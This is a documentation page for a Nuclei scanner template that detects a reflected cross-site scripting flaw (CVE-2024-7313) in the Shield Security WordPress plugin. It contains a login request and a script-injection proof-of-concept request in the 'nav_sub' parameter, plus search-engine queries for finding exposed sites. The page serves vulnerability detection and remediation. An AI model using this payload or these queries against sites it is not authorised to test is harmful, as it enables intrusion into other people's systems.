Skip to content
Nuclei Templates

Shield Security Plugin < 20.0.6 - Cross-Site Scripting

ID: CVE-2024-7313

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,xss,wp-plugin,authenticated,wp-simple-firewall

Description

Section titled “Description”

The Shield Security WordPress plugin before 20.0.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the ‘nav_sub’ parameter in the admin dashboard, allowing authenticated users to execute arbitrary JavaScript in the context of other authenticated administrators.

YAML Source

Section titled “YAML Source”
id: CVE-2024-7313


info:
  name: Shield Security Plugin < 20.0.6 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Shield Security WordPress plugin before 20.0.6 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'nav_sub' parameter in the admin dashboard, allowing authenticated users to execute arbitrary JavaScript in the context of other authenticated administrators.
  remediation: |
    Update the Shield Security plugin to version 20.0.6 or later.
  reference:
    - https://wpscan.com/vulnerability/83a1bdc6-098e-43d5-89e5-f4202ecd78a1/
    - https://research.cleantalk.org/CVE-2024-7313/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7313
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-7313
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="wp-content/plugins/wp-simple-firewall/"
    google-query: inurl:"/wp-content/plugins/wp-simple-firewall/"
    shodan-query: 'wp-content/plugins/wp-simple-firewall/'
  tags: cve,cve2024,wp,wordpress,xss,wp-plugin,authenticated,wp-simple-firewall


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1


      - |
        GET /wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "<script>alert(document.domain)</script>"
          - "Unavailable nav handling:"
        condition: and


      - type: word
        part: header_2
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a0047304502210088e625caf823c0d22f6d36373d406d7eb01fd067cd6541ceab2f121152fb8bff022044584daf6a48bc9128f8815286a9f43ebe7f027bb7a9a05fdeed32d17e0cc0b4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7313.yaml"

View on Github